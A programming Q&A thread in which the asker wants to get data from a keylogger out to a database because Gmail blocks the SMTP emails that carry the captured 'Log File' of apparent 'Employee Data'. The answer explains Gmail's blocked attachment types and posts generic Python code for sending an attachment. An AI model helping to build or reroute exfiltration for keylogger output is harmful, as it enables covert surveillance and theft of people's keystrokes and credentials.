# How to send data from a python file to a database

Tags: python, python-3.x, database, azure-sql-database, python-3.7

Please I want to send data from these python files to my database. How do I go about it?

the following file path saves data from this keylogger, which is sent an email using the smtp library.

```
File_path = "******"  # file path files are saved to
extend = "\\"
file_merge = file_path + extend
```

which is sent an email using the smtp library.
'''
def send_email(system_information, filename, attachment, toaddr):
fromaddr = email_address

```
msg = MIMEMultipart()

msg['From'] = fromaddr

msg['To'] = toaddr

msg['Subject'] = "Log File"

body = "EMployee Data"

msg.attach(MIMEText(body, 'plain'))

filename = filename
attachment = open(attachment, 'rb')

p = MIMEBase('application', 'octet-stream')

p.set_payload(attachment.read())

encoders.encode_base64(p)

p.add_header('Content-Disposition', "attachment; filename= %s" % filename)

msg.attach(p)

s = smtplib.SMTP('smtp.gmail.com', 587)

s.starttls()

s.login(fromaddr, password)

text = msg.as_string()

s.sendmail(fromaddr, toaddr, text)

s.quit()
```

'''
but google is blocking the mails saying its "content presents a potential\n5.7.0 security issue"
therefore I want to now create database with a table I can now send the data to instead of the mail

Comment: your question is not clear and we can't read in your mind. What did you try? Where is your code? What database do you mean? Did you found module for this database? What do you have in files? What tables and columns you have in databases? You have to put all details in question (not in comments)

Answer (score 0):

> The error content presents a potential\n5.7.0 security issue shows
> that it has not supported file you are using

Please check [here](https://support.google.com/mail/answer/6590?hl=en#zippy=%2Cmessages-that-have-attachments%2Cmessages-that-dont-have-attachments) **File types blocked in gmail**. Files those are mentioned in the url which are not acceptable to send using SMTP mail

I have used below code to send a file using python

```
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
mail_content = '''Hello,


#The mail addresses and password

sender_address = 'sender@gmail.com'
sender_pass = 'xxxxxxxx'
receiver_address = 'receiver@gmail.com'

#Setup the MIME

message = MIMEMultipart()
message['From'] = sender_address
message['To'] = receiver_address
message['Subject'] = 'A test mail sent by Python. It has an attachment.'

#The subject line
#The body and the attachments for the mail

message.attach(MIMEText(mail_content, 'plain'))
attach_file_name = 'test.pdf' #
attach_file = open(attach_file_name, 'rb')

#Open the file as binary mode

payload = MIMEBase('application', 'octate-stream')
payload.set_payload((attach_file).read())
encoders.encode_base64(payload)

#encode the attachment
#add payload header with filename

payload.add_header('Content-Decomposition', 'attachment', filename=attach_file_name)
message.attach(payload)

#Create SMTP session for sending the mail
#use gmail with port

session = smtplib.SMTP('smtp.gmail.com', 587)

#enable security

session.starttls()

#login with mail_id and password

session.login(sender_address, sender_pass)
text = message.as_string()
session.sendmail(sender_address, receiver_address, text)
session.quit()
print('Mail Sent')
```

Refer [here](https://www.tutorialspoint.com/send-mail-with-attachment-from-your-gmail-account-using-python)